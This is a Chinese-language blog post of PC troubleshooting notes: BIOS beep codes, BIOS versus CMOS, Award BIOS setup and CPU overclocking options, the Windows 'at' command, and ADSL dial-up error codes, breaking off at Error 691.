2009年4月7日星期二

Bios铃声的含义

BB是报警的声音
你可以根据报警声音长短,数目来判断问题出在什么地方
AWARD BIOS响铃声的一般含义是:
1短: 系统正常启动。这是我们每天都能听到的,也表明机器没有任何问题。
2短: 常规错误,请进入CMOS Setup,重新设置不正确的选项。
1长1短: RAM或主板出错。换一条内存试试,若还是不行,只好更换主板。
1长2短: 显示器或显示卡错误。
1长3短: 键盘控制器错误。检查主板。
1长9短: 主板Flash RAM或EPROM错误,BIOS损坏。换块Flash RAM试试。
不断地响(长声): 内存条未插紧或损坏。重插内存条,若还是不行,只有更换一条内存。
不停地响: 电源、显示器未和显示卡连接好。检查一下所有的插头。
重复短响: 电源问题。
无声音无显示: 电源问题。

AMI BIOS响铃声的一般含义是:
1. 一短声,内存刷新失败。内存损坏比较严重,恐怕非得更换内存不可。
2. 二短声,内存奇偶校验错误。可以进入CMOS设置,将内存Parity奇偶校验选项关掉,即设置为Disabled。不过一般来说,内存条有奇偶校验并且在CMOS设置中打开奇偶校验,这对微机系统的稳定性是有好处的。
3. 三短声,系统基本内存(第1个64Kb)检查失败。更换内存吧。
4. 四短声,系统时钟出错。维修或更换主板。
5. 五短声,CPU错误。但未必全是CPU本身的错,也可能是CPU插座或其它什么地方有问题,如果此CPU在其它主板上正常,则肯定错误在于主板。
6. 六短声,键盘控制器错误。如果是键盘没插上,那好办,插上就行;如果键盘连接正常但有错误提示,则不妨换一个好的键盘试试;否则就是键盘控制芯片或相关的部位有问题了。
7. 七短声,系统实模式错误,不能切换到保护模式。这也属于主板的错。
8. 八短声,显存读/写错误。显卡上的存贮芯片可能有损坏的。如果存贮片是可插拔的,只要找出坏片并更换就行,否则显卡需要维修或更换。
9. 九短声,ROM BIOS检验出错。换块同类型的好BIOS试试,如果证明BIOS有问题,你可以采用重写甚至热插拔的方法试图恢复。
10. 十短声,寄存器读/写错误。只能是维修或更换主板。
11. 十一短声,高速缓存错误。
12. 如果听不到beep响铃声也看不到屏幕显示,首先应该检查一下电源是否接好,在检修时往往容易疏忽,不接上主板电源就开机测试。其次得看看是不是少插了什么部件,如CPU、内存条等。再次,拔掉所有的有疑问的插卡,只留显示卡试试。最后找到主板上清除(clear)CMOS设置的跳线,清除CMOS设置,让BIOS回到出厂时状态。如果显示器或显示卡以及连线都没有问题,CPU和内存也没有问题,经过以上这些步骤后,微机在开机时还是没有显示或响铃声,那就只能是主板的问题了。

POENIX的BIOS报警声(以前的老板上有许多POENIX的,可现在已经被AWARD收购了)
1短 系统启动正常
1短1短1短 系统加电初始化失败
1短1短2短 主板错误
1短1短3短 CMOS或电池失效
1短1短4短 ROM BIOS校验错误
1短2短1短 系统时钟错误
1短2短2短 DMA初始化失败
1短2短3短 DMA页寄存器错误
1短3短1短 RAM刷新错误
1短3短2短 基本内存错误
1短3短3短 基本内存错误
1短4短1短 基本内存地址线错误
1短4短2短 基本内存校验错误
1短4短3短 EISA时序器错误
1短4短4短 EISA NMI口错误
2短1短1短 前64K基本内存错误
3短1短1短 DMA寄存器错误
3短1短2短 主DMA寄存器错误
3短1短3短 主中断处理寄存器错误
3短1短4短 从中断处理寄存器错误
3短2短4短 键盘控制器错误
3短1短3短 主中断处理寄存器错误
3短4短2短 显示错误
3短4短3短 时钟错误
4短2短2短 关机错误
4短2短3短 A20门错误
4短2短4短 保护模式中断错误
4短3短1短 内存错误
4短3短3短 时钟2错误
4短3短4短 时钟错误
4短4短1短 串行口错误
4短4短2短 并行口错误
4短4短3短 数字协处理器错误

BIOS可以被映射

因为BIOS使用的ROM比我们使用的普通内存RAM要慢很多,所以人们就想出在启动后把BIOS的ROM里面的信息拷贝到我们插的内存条(RAM)里来,提高读取速度,而在RAM里的这些BIOS的信息就叫做BIOS影子内存。

BIOS与CMOS区别

在日常操作和维护计算机的过程中,常常可以听到有关BIOS设置和CMOS设置的一些说法,许多人对BIOS和CMOS经常混为一谈。本文主要阐述对BIOS设置和CMOS设置在基本概念上的区分与联系。

BIOS是什么?

所谓BIOS,实际上就是微机的基本输入输出系统(Basic Input-Output System),其内容集成在微机主板上的一个ROM芯片上,主要保存着有关微机系统最重要的基本输入输出程序,系统信息设置、开机上电自检程序和系统启动自举程序等。

BIOS的功用

BIOS ROM芯片不但可以在主板上看到,而且BIOS管理功能如何在很大程度上决定了主板性能是否优越。BIOS管理功能主要包括:

1. BIOS中断服务程序

BIOS中断服务程序实质上是微机系统中软件与硬件之间的一个可编程接口,主要用来在程序软件与微机硬件之间实现衔接。例如,DOS和Windows操作系统中对软盘、硬盘、光驱、键盘、显示器等外围设备的管理,都是直接建立在BIOS系统中断服务程序的基础上,而且操作人员也可以通过访问INT 5、INT 13等中断点而直接调用BIOS中断服务程序。

2.BIOS系统设置程序

微机部件配置记录是放在一块可读写的 CMOS RAM 芯片中的,主要保存着系统基本情况、CPU特性、软硬盘驱动器、显示器、键盘等部件的信息。在 BIOS ROM芯片中装有"系统设置程序",主要用来设置CMOS RAM中的各项参数。这个程序在开机时按下某个特定键即可进入设置状态,并提供了良好的界面供操作人员使用。事实上,这个设置CMOS参数的过程,习惯上也称为" BIOS设置"。一旦CMOS RAM芯片中关于微机的配置信息不正确时,轻者会使得系统整体运行性能降低、软硬盘驱动器等部件不能识别,严重时就会由此引发一系统的软硬件故障。

3. POST上电自检

微机按通电源后,系统首先由POST(Power On Self Test,上电自检)程序来对内部各个设备进行检查。通常完整的POST自检将包括对 CPU、640K基本内存、 1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘进行测试,一旦在自检中发现问题,系统将给出提示信息或鸣笛警告。

4. BIOS系统启动自举程序

系统在完成 POST自检后, ROM BIOS 就首先按照系统 CMOS设置中保存的启动顺序搜寻软硬盘驱动器及CD-ROM、网络服务器等有效地启动驱动器,读入操作系统引导记录,然后将系统控制权交给引导记录,并由引导记录来完成系统的顺利启动。

CMOS是什么?

CMOS(本意是指互补金属氧化物半导体存储嚣,是一种大规模应用于集成电路芯片制造的原料)是微机主板上的一块可读写的RAM芯片,主要用来保存当前系统的硬件配置和操作人员对某些参数的设定。CMOS RAM芯片由系统通过一块后备电池供电,因此无论是在关机状态中,还是遇到系统掉电情况,CMOS信息都不会丢失。

由于CMOS RAM芯片本身只是一块存储器,只具有保存数据的功能,所以对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留在软盘上的(如IBM的PC/AT机型),使用很不方便。现在多数厂家将CMOS设置程序做到了 BIOS芯片中,在开机时通过按下某个特定键就可进入CMOS设置程序而非常方便地对系统进行设置,因此这种CMOS设置又通常被叫做BIOS设置。

BIOS设置和CMOS设置的区别与联系

BIOS是主板上的一块EPROM或EEPROM芯片,里面装有系统的重要信息和设置系统参数的设置程序(BIOS Setup程序);CMOS是主板上的一块可读写的RAM 芯片,里面装的是关于系统配置的具体参数,其内容可通过设置程序进行读写。CMOS RAM 芯片靠后备电池供电,即使系统掉电后信息也不会丢失。BIOS与CMOS既相关又不同:BIOS中的系统设置程序是完成CMOS参数设置的手段;CMOS RAM既是BIOS设定系统参数的存放场所,又是 BIOS设定系统参数的结果。因此,完整的说法应该是"通过BIOS设置程序对CMOS参数进行设置"。由于 BIOS和CMOS都跟系统设置密初相关,所以在实际使用过程中造成了BIOS设置和CMOS设置的说法,其实指的都是同一回事,但BIOS与CMOS却是两个完全不同的概念,千万不可搞混淆。

何时要对BIOS或CMOS进行设置?

众所周知,进行BIOS或CMOS设置是由操作人员根据微机实际情况而人工完成的一项十分重要的系统初始化工作。在以下情况下,必须进行BIOS或CMOS进行设置:

1、新购微机

即使带PnP功能的系统也只能识别一部分微机外围设备,而对软硬盘参数、当前日期、时钟等基本资料等必须由操作人员进行设置,因此新购买的微机必须通过进行CMOS参数设置来告诉系统整个微机的基本配置情况。

2.新增设备

由于系统不一定能认识新增的设备,所以必须通过CMOS设置来告诉它。另外,一旦新增设备与原有设备之间发生了IRQ、DMA冲突,也往往需要通过BIOS设置来进行排除。

3.CMOS数据意外丢失

在系统后备电池失效、病毒破坏了 CMOS数据程序、意外清除了CMOS参数等情况下,常常会造成CMOS数据意外丢失。此时只能重新进入BIOS设置程序完成新的CMOS参数设置。

4.系统优化

对于内存读写等待时间、硬盘数据传输模式、内/外 Cache的使用、节能保护、电源管理、开机启动顺序等参数, BIOS中预定的设置对系统而言并不一定就是最优的,此时往往需要经过多次试验才能找到系统优化的最佳组合。

AWARD BIOS设置详解

AWARD公司是世界最大的BIOS生产厂商之一,其产品也被广泛使用。但由于AWARD BIOS里面的信息都是基于英文且需要用户对相关专业知识的理解相对深入,使得普通用户设置起来感到困难很大。而如果这些设置不当的话,将会影响整台电脑的性能设置是不能正常使用,所以一份详细的设置说明是必要的。下面就介绍一下AWARD BIOS中的有关设置选项的含义和设置方法。

【Standard CMOS Setup】(标准设定)
在本菜单中,用户可以修改日期、时间、第一主IDE设备(硬盘)和IDE设备(硬盘或CD-ROM)、第二个主IDE设备(硬盘或CD-ROM)和从IDE设备(硬盘或CD-ROM)、软驱A与B、显示系统的类型、什么出错状态要导致系统启动暂停等。主要说明如下:

(1) 用户可以在Type(类型)和Mode(模式)项设置为Auto,使BIOS自动检测硬盘。也可以在主菜单中的【IDE HDD Auto Detection】操作来设置。用户还可以使用User选项,手动设定硬盘的参数。您必须输入柱面数(Cyls),磁头数(Heads),写预补偿(Precomp),磁头着陆区(Landz),每柱面扇区数(Sectorxs),工作模式(Mode,内容见下)等几种参数。硬盘大小在上述参数设定后自动产生。

硬盘工作模式(MODE)的三种选項:

NORMAL模式:传統的标准模式,支持硬盘容量最高至528MB。
LARGE模式:当硬盘容量超过528MB,而硬盘或操作系統不支持LBA模式时,可采用此选项。
LBA 模式(Logical Block Addressing Mode):适用于硬盘容量超过528M且支持"逻辑区块地址"(LBA)功能(一般都使用此项)

(2) 显示类型可选EGA/VGA(EGA、VGA、SEGA、SVGA、PGA显示适配卡选用)、CGA40(CGA显示卡,40列方式)、CGA80(CGA显示卡,80列方式)、MONO(单色显示方式,包括高分辨率单显卡)等四种,用户应根据情况正确选用。

(3) 暂停的出错状态选项有:
1. AllErrors:BIOS检测到任何错误,系统启动均暂停并且给出出错提示。
2. NoErrors:BIOS检测到任何错误都不使系统启动暂停。
3. All ,But Keyboard:除键盘错误外,BIOS检测到任何其它错误,均暂停系统启动并且给出出错提示。
4. All ,But Disk/Key:除键盘、磁盘错误外,BIOS检测到任何其它错误,均暂停系统启动并且给出出错提示。

【BIOS Features Setup】(功能设定)
该项用来设置系统配置选项清单,其中有些选项由主板本身设计确定,有些选项用户可以进行修改设定,以改善系统的性能。主要说明如下:
(1) VirusWarning:病毒防御警告(缺省值为Disable),此功能可防止硬盘的关键磁区及分区被更改,任何试图写入该区的操作將会导致系統死机并形式警告信息。
注意:当安装新的操作系統(如Win95)时,请先取消(disable)此功能,以免因冲突而无法顺利安装。
(2) CPU Internal Cache:缺省为Enable(开启),它允许系统使用CPU内部的第一级Cache。486、586档次的CPU内部一般都带有Cache,除非当该项设为开启时系统工作不正常,此项一般不要轻易改动。该项若置为Disable(关闭),将会降低系统的性能。
(3) External Cache:缺省设为Enable,它用来控制主板上的第二级(L2)Cache。根据主板上是否带有Cache,选择该项的设置。
(4) Quick Power On Self Test:缺省设置为Enable,该项主要功能为加速系统上电自测过程,它将跳过一些自测试。使引导过程加快。
(5) IDE HDD Block Mode Sectors:IDE硬盘设定, 預设值为HDDMAX。新式IDE硬盘大多支持一次传输多个磁块的功能。启用(enable)本功能可加快硬盘存取速度。选項有HDDMAX、Disabled、2、4、8、16、及32。
(6) HDD Sequence SCSI/IDE First:IDE/SCSI硬盘开机优先顺序设定,缺省值为IDE。当同时安装SCSI及IDE硬盘时,本选项功能可用来选择以SCSI或IDE硬盘作为开机硬盘。
(7) BootSequence:选择驱动器启动顺序。一般有以下几种启动顺序:
[A,CD-ROM,C]、[CD-ROM,C,A]、[D,A]、[E,A]、[F,A]、[C only]、[A,C]、[C,A]
请注意,某些老式主板并不支持由CD-ROM启动,而现在的新主板增加了更多的启动顺序如LS120,ZIP等。
(8) Swap Floppy Drive:(交换软盘驱动器)缺省设定为Disable。当它Disable时,BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时,BIOS将把软驱连线对接端子所接的软盘驱动器当作第一驱动器,即在DOS下A盘当作B盘用,B盘当作A盘用。
(9) BootUp Floppy Seek:当Enable时,机器启动时BIOS将对软驱进行寻道操作。
(10) Floppy Disk Access Contol:当该项选在R/W状态时,软驱可以读和写,其它状态只能读。
(11) BootUp Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时,系统启动后,小键盘的缺省为数字状态;设为OFF时,系统启动后,小键盘的状态为箭头状态。
(12) BootUp System Speed:该选项用来确定系统启动时的速度为HIGH还是LOW。
(13) Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时,如果按下键盘上的某个键不放,机器按您重复按下该键对待(重复按键速度可在下面的选项中设置);当置为Disable时,如果按下键盘上的某个键不放,机器按键入该键一次对待。
(14) Typematic Rate:如果上面的选项置为Enable,那么可以用此选项设定当您按下键盘上的某个键一秒钟,那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
(15) Typematic Delay:如果(13)选项置为Enable,那么可以用此选项设定按下某一个键时,延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000,单位为毫秒。
(16) Security Option:选择System时,每次开机启动时都会提示您输入密码,选择Setup时,仅在进入CMOS Setup时会提示您输入密码(该设置仅在设置了密码的情况下有效)。
(17) PS/2Mouse Function Control:当该项设为Enable,机器提供对于PS/2类型鼠标的支持。否则,选Disable。
(18) Assign PCI IRQ For VGA:选Enable时,机器将自动设定PCI显示卡的IRQ到系统的DRAM中,以提高显示速度和改善系统的性能。
(19) PCI/VGA Palett Snoop:该项用来设置PCI/VGA卡能否与MPEGISA/VESAVGA卡一起用。当PCI/VGA卡与MPEGISA/VESAVGA卡一起用时,该项应设为Enable,否则,设为Disable。
(20) OS/2 Select For DRAM>64MB:该项允许您在OS/2操作系统中,使用64M以上的内存。该项可选为NON-OS2,OS2。
(21) System BIOS Shadow:该选项的缺省设置默认为Enable,当它开启时,系统BIOS将拷贝到系统Dram中,以提高系统的运行速度和改善系统的性能。
(22) Video BIOS Shadow:缺省设定为开启(Enable),当它开启时,显示卡的BIOS将拷贝到系统DRAM中,以提高显示速度和改善系统的性能。
(23) C8000-CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映射区,一般都设定为禁止(Disable)。如果有某一扩充卡ROM需要映射,则用户应搞清楚该ROM将映射地址和范围,可以将上述的几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的地址空间将占用系统的640K~1024K之间的某一段内存。

【Chipset Features Setup】(芯片组功能设定)
该项用来设置系统板上芯片的特性。它有以下选项:

注意:此菜单下的选项会因不同主板而不同,如果你不太了解它们的功能,最好设置为缺省值。

(1) ISA Bus Clockfrequency(PCICLK/4)ISA:传输速率率设定,设定值有:PCICLK/3;PCICLK/4。
(2) Auto Configuration:自动状态设定,当设定为Enabled时BIOS依最佳状况状态设定,此时BIOS会自动设定DRAMTiming,所以会有无法修改DRAM的细项时序,我们强烈建议选用Enabled,因为任意改变DRAM的时序可能造成系统不稳或不开机。
(3) Aggressive Mode:高级模式设定,当您想获得较好的效能时,而且系统在非常稳定状态下,可以尝试Enabled此项功能以增加系统效能,不过必须使用较快速DRAM(60ns以下)。
(4) VIDEO BIOS Cacheable:(视频快取功能,缺省值为Disable),为Enable时,启用快取功能以加快显示速度;为Disable时,取消此功能。
(5) Memory Holeat Address:(缺省值为None),一些ISA卡会要求使用14-16MB或15-16MB的内存地址空间,若选取14MB-16MB或15MB-16MB,则系統將无法使用这部份的内存空间。您可选取None来取消此功能。
(6) OnboardFDC SwapA:B:(A,B盘互換,缺省值为NoSwap),当启用(enable)本項功能时则A,B盘互換 。亦即原先A盘被指定成B盘,B盘被指定为A盘。如此一来,您就不需打开机箱互换排线了。
(7) OnboardSerialPort1:(缺省值为3F8H/IRQ4),设定主机板上串口1的位址及IRQ,选項有:3F8H/IRO4、2F8H/IRQ3、3E8H/IRQ4、2E8H/IRQ10、Disable。
(8) OnboardSerialPort2:(缺省值为2F8H/IRQ3),设定主机板上串口2的位址及IRQ,选項有:3F8H/IRQ4、2F8H/IRQ8、3E8H/IRQ4、2E8H/IRQ10、Disable。
(9) OnboardParallelPort:(缺省值为378H/IRQ7),设定主机板上并口的位址及IRQ。
(10) Parallel PortMode:(并口模式,缺省值为ECP+EPP),并口的操作模式有下列选項:
Normal:一般速度单向运行。
EPP:最高速度双向运行。
ECP:超高速双自运行。
ECP+EPP:ECP与EPP二种模式并用。
(11) ECP DMA Select:(ECP DMA通道选择,缺省值为3),若在ECP模式下操作时,则提供DMA通道选择,有1,3,Disable三种设定。
(12) UART2 UseInfrared:(缺省值为Disable),本項功能用来支持紅外线(IR)传输功能。为Enable时,则设定第二序列UART支持红外线传输功能。设为Disable时,则设定第二序列UART支持COM2。
注意:如果没有红外线设备,不要Enable此项,否则会造成不必要的麻烦,例如系统不识别MODEM。
(13) Onboard PCI IDE Enable:(主机板IDE通道设置,缺省值为Both),用来启用內建IDE通道。选项有:
Primary IDE Channel:仅启动主IDE通道(即第一IDE通道)。
Secondary IDE Channel:仅启动辅IDE通道(即第二IDE通道)。
Both:第一、二IDE通道均启用。
Disable:禁用所有IDE通道。
(14) IDE PIO Mode:这个设置取决于系统硬盘的速度,包括AUTO,0,1,2,3,4五个选项,Mode4硬盘传输速率大于是16.6MB/秒,其它模式的小于这个速率。请不要选择超过硬盘速率的模式,这样会丢失数据。
(15) IDE UDMA(UltraDMA) Mode:Intel430TX以后的芯片提供了Ultra DMA Mode,它可以把传输速率提高到一个新的水准。
(16) IDE0Master/SlaveMode,IDE1Master/SlaveMode:(硬盘时序模式设定,缺省值为Auto),设为Auto时,系統会自动检查四個IDE 装置的时序模式以确保以最佳速度运行。也可以自行设定时序模式为(0,1,2,3,4)。

【Power Management Setup】(节电功能设定)
该项为电源管理设定,用来控制主板上的"绿色"功能。该功能定时关闭视频显示和硬盘驱动器以实现节能的效果。具体来说,实现节电的模式有四种:

1、Doze模式:当设定时间一到,CPU时钟变慢,其他设备照常运作;
2、Standby模式:当设定时间一到,硬盘和显示将停止工作,其他设备照常运作;
3、Suspend模式:当设定时间一到,除CPU以外的所有设备都将停止工作;
4、HDD Power Down模式:当设定时间一到,硬盘停止工作,其他设备照常运作。

该菜单项下面的可供选择的内容有以下几种:

(1) Power Management:节电模式的主控项,有四种设定:
Max Saving:(最大节电)在一个较短的系统不活动的周期(Doze、Standby、Suspend、HDDPowerDown四种模式的缺省值均为1分钟)以后,使系统进入节电模式,这种模式节电最大。
MIN Saving:(最小节电)在一段较长的系统不活动的周期在这种情况下,(Doze,Standby,Suspend三种模式的缺省值均为1小时,HDD Power Down模式的缺省值为15分钟)后,使系统进入节电模式。
Disable:关闭节电功能,是缺省设置。
User Defined:(用户定义)允许用户根据自己的需要设定节电的模式。

(2) VideoOFFOption:(显示器关闭设定,缺省值为Susp, Stby->Off),本选项用来设定在何种模式下关闭显示器,选项如下:
1. Susp,Stby->Off:只在待机(Standby)或暫停(Suspend)的省电模式下才关闭显示器。
2. Suspend->Off:只在暫停(Suspend) 模式下才关闭显示器。
3. Alwayson:在任何模式下均不关,显示器照常显示。
4. Allmodes->Off:在任何省电模式下均关闭显示器。

(3) Video Off Method:(视频关闭)该选项可设为V/HSync+Blank、Dpms、BlankScreen三种,具体如下:

1. V/HSync+Blank:将关闭显示卡水平与垂直同步信号的输出端口,向视频缓冲区写入空白信号。
2.DPMS(显示电源管理系统):设定允许BIOS在显示卡有节电功能时,对显示卡进行节能信息的初始化。只有显示卡支持绿色功能时,用户才能使用这些设定。如果没有绿色功能,则应将该行设定为Blank Screen(关掉屏幕)。
3. Blank Screen(关掉屏幕):当管理关掉显示器屏幕时,缺省设定能通过关闭显示器的垂直和水平扫描以节约更多的电能。没有绿色功能的显示器,缺省设定只能关掉屏幕而不能终止CRT的扫描。
(4) PM Timers(电源管理记时器):下面的几项分别表示对电源管理超时设置的控制。Doze,StandBy和Suspend Mode项设置分别为该种模式激活前的机器闲置时间,在MAX Saving模式,它每次在一分钟后激活。在MIN Saving模式,它在一小时后激活。
(5) Power Down、Resume Events(进入节电模式和从节电状态中唤醒的事件):该项下面所列述的事件可以将硬盘设在最低耗电模式,工作、等待和悬挂系统等非活动模式中若有事件发生,如敲任何键或IRQ唤醒、鼠标动作、MODEM振铃时,系统自动从电源节电模式下恢复过来。
(6) Soft-OffByPwr-Bttn:ATX机箱的设计不同于传统机箱,按下开关4秒以上才能关闭系统;选择instant-off方式将使ATX机器等同于传统机器,而若置为delay4sec方式,那么您按住开关的时间不足4秒时将使系统进入SuspendMode。

【PNP/PCI Configuration Setup】(即插即用与PCI状态设定)
该菜单项用来设置即插即用设备和PCI设备的有关属性。

(1) PNP OS Installed:如果软件系统支持Plug-Play,如Win95,可以设置为YES。
(2) Resources ControlledBy:AWARD BIOS支持"即插即用"功能,可以检测到全部支持"即插即用"的设备,这种功能是为类似Win95之类操作系统所设计,可以设置Auto(自动)或Manual(手动)。
(3) Resources Configuration Data:缺省值是Disabled,如果选择Enabled,每次开机时,Extend System Configuration Data(扩展系统设置数据)都会重新设置。
(4) IRQ 3/4/5/7/9/10/11/12/14/15,Assingned To:在缺省状态下,所有的资源除了IRQ3/4,都设计为被PCI设备占用,如果某些ISA卡要占用某资源可以手动设置。

【Load BIOS Defaults】(载入BIOS缺省值)
当系統安装后不太稳定,则可选用本功能。此时系统将会取消一些高效能的操作模式设定,而处在最保守状态下。因此使用它容易找到主机板的安全值和除去主板的错误。当选择本项时,主画面会出现下列信息:
Load BIOS Defaults(Y/N)?
键入Y并按Enter即可执行本项功能。
注意:本项功能不会影响CMOS內存储的"标准设定"(即【Standard CMOS Setup】项的设置值)

【Load Setup Defaults】(載入SETUP缺省值)
此为BIOS出厂的设定值。此时系统会以最佳化的模式运行。选择此功能时,主画面会出现下列信息:
Load SETUP Defaults(Y/N)?
键入Y并按Enter即可执行本项功能。

【Supervisor Password And User Password Setup】(管理者与使用者密码设定)
User Passowrd Setting功能为设定密码。如果要设定此密码,首先应输入当前密码,确定密码后按y,屏幕自动回到主画面。输入User Passowrd可以使用系统,但不能修改CMOS的内容。输入SupervisorPassword可以输入、修改CMOS BIOS的值,Supervisor Password是为了防止他人擅自修改CMOS的内容而设置的。用户如果使用IDE硬盘驱动器,该项功能可以自动读出硬盘参数,并将它们自动记入标准CMOS设定中,它最多可以读出四个IDE硬盘的参数。

【Saveand Exit Setup】將设定值儲存後,离开设置主画面。

【Exit Without Saving】不儲存设定值,直接离开设置主画面。
以上介绍了Award BIOS Setup的常用选项的含义及设置办法。由于每种版本的BIOS具体设置都有所不同,所以上面列举的设置项目,可能少于或多于你系统内的项目,但一般情况下,各种设置都大同小异,触类旁通。另外,由于AMI BIOS的设置同AWARD BIOS基本相同,这里就一一介绍。

免跳线CPU在BIOS中的设置

--------------------------------------------------------------------------------

目前有不少免跳线主板采用BIOS程序设置CPU工作状态,这无疑是超频族的福音,因为它免去了许多麻烦,给用户带来了方便。如升技BH6、微星6119 W(中文BIOS)等主板,只要将CPU插好,启动计算机,进入BIOS设置程序,就可对CPU参数进行设置,设置的内容包括CPU工作电压、CPU外频和CPU内频等。下面就介绍具体的设置:
(1) CPU Operating Speed:CPU的内核工作速度设定。选项包括:User Define(用户定义)、233(66×3.5)、266(66×4)、300(66×4.5)、333(66×5)、350(100×3.5)、400(100×4)等选项。选择User Define后,CPU外频和倍频由用户在下面的(3)、(4)中自行设置。另外,最新的微星6119(W)的BIOS设置中的CPU Plug & Play选项,可自动检测CPU、设置其工作状态。
(2) Turbo Frequency:CPU外频加速模式设定。当Enable时,CPU的频率被提升2.5%,此项目仅在External Clock(外频)支持Turbo模式时方出现(目前只对100MHz提供支持)。
(3) External Clock:CPU外频设定,包括66、75、83、100、112、124、133MHz等选项。
(4) Multiplier Factor:CPU倍频设定,有2.0、2.5、3.0、3.5、4.0、4.5、5.0、5.5倍等选项
(5) SEL100/66# Signal:Signal 100/66信号设定,包括High"(高)和"Low"(低)两个选项。当设置为"High"时,CPU外频为100MHz,设置为"Low"时为66MHz。
注意:有些PⅡ350和PⅡ400运行在100MHz外频时,倍频分别被锁定于3.5和4.0倍频,SEL100/66#信号设置为"Low",可解除对倍频的锁定。
(6) AGPCLK/CPUCLK:AGP时钟设定。缺省值为2/3,此时AGP工作频率是CPU外频的2/3,如改设为1/1,则AGP工作频率等于CPU外频。
(7) Speed Error Hold:速度错误处理设定。包括"Disable"和"Enable"选项。默认 为"Disable"。如设置为"Enable"则相当于禁止超频,由系统自动检测CPU,发现设置值与CPU标称值不符时系统拒绝工作。
(8) CPU Power Supply:CPU电压设定。包括"CPU Default"(默认)和"User Define"(用户定义)选项。选择"User Define"时,需在(9)中设置CPU内核电压。
(9) Core Voltage :CPU内核电压设定。包括1.30V至3.2V间的电压选项。选择项中对电压有一定限制,对2.8V 的 Pentium Ⅱ,电压最高可调至3.2V;对2.0V的Pentium Ⅱ,最高只可调至2.3V。

at命令的用法

At
列出在指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行“计划”服务才能使用 at 命令。

at [\\computername] [[id] [/delete] | /delete [/yes]]

at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command

参数

如果在没有参数的情况下使用,则 at 列出已计划的命令。

\\computername

指定远程计算机。如果省略该参数,命令将安排在本地计算机。

id

指定指派给已计划命令的识别码。

/delete

取消已计划的命令。如果省略了 id,计算机中已计划的命令将被全部取消。

/yes

当删除已计划的事件时,对系统的查询强制进行肯定的回答。

time

指定运行命令的时间。将时间以 24 小时标记(00:00 [午夜] 到 23:59)的方式表示为小时:分钟。

/interactive

允许作业与在作业运行时登录用户的桌面进行交互。

/every:date[,...]

在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行命令。将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的数字)。用逗号分隔多个日期项。如果省略了 date,将假定为该月的当前日期。

/next:date[,...]

在重复出现下一天(例如,下个星期四)时,运行指定命令将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的数字)。用逗号分隔多个日期项。如果省略了 date,将假定为该月的当前日期。

command

指定要运行的 Windows 2000 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的 UNC 符号,而不是远程驱动器号。如果命令不是可执行 (.exe) 文件,必须在命令前加上 cmd /c,例如:

cmd /c dir > c:\test.out

ADSL拨号中出现的错误代码

Error 602 The port is already open

问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

Error 605 Cannot set port information

问题:拨号网络网络由于设备安装错误不能设定使用端口

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

Error 606 The port is not connected

问题:拨号网络网络不能连接所需的设备端口

原因:RasPPPoE没有完全和正确的安装,连接线故障,ADSL MODEM故障

解决:卸载干净任何PPPoE软件,重新安装,检查网线和 ADSL MODEM

Error 608 The device does not exist

问题:拨号网络网络连接的设备不存在

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

Error 609 The device type does not exist

问题:拨号网络网络连接的设备其种类不能确定

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

Error 611 The route is not available/612 The route is not allocated

问题:拨号网络网络连接路由不正确

原因:RasPPPoE没有完全和正确的安装,ISP服务器故障

解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问

Error 617 The port or device is already disconnecting

问题:拨号网络网络连接的设备已经断开

原因:RasPPPoE没有完全和正确的安装,ISP服务器故障,连接线,ADSL MODEM故障

解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问 ,检查网线和 ADSL MODEM

Error 619

问题:与ISP服务器不能建立连接

原因:ADSL ISP服务器故障,ADSL电话线故障

解决:检查ADSL信号灯是否能正确同步。致电ISP询问

Error 621 Cannot open the phone book file

Error 622 Cannot load the phone book file

Error 623 Cannot find the phone book entry

Error 624 Cannot write the phone book file

Error 625 Invalid information found in the phone book

问题:Windows NT或者Windows 2000 Server网络RAS网络组件故障

原因:软件安装问题

解决:卸载所有PPPoE软件,重新安装RAS网络组件和RasPPPoE

Error 630

问题:ADSL MODEM没有没有响应

原因:ADSL电话线故障,ADSL MODEM故障(电源没打开等)

解决:检查ADSL设备

Error 633

问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

Error 638

问题:过了很长时间,无法连接到ISP的ADSL接入服务器

原因:ISP服务器故障;在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码

解决:运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务,以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。

Error 645

问题:网卡没有正确响应

原因:网卡故障,或者网卡驱动程序故障

解决:检查网卡,重新安装网卡驱动程序

Error 650

问题:远程计算机没有响应,断开连接

原因:ADSL ISP服务器故障,网卡故障,非正常关机造成网络协议出错

解决:检查ADSL信号灯是否能正确同步,致电ISP询问;检查网卡,删除所有网络组件重新安装 网络。

Error 651

问题:ADSL MODEM报告发生错误

原因:Windows处于安全模式下,或其他错误

解决:出现该错误时,进行重拨,就可以报告出新的具体错误代码

Error 691

问题:输入的用户名和密码不对,无法建立连接

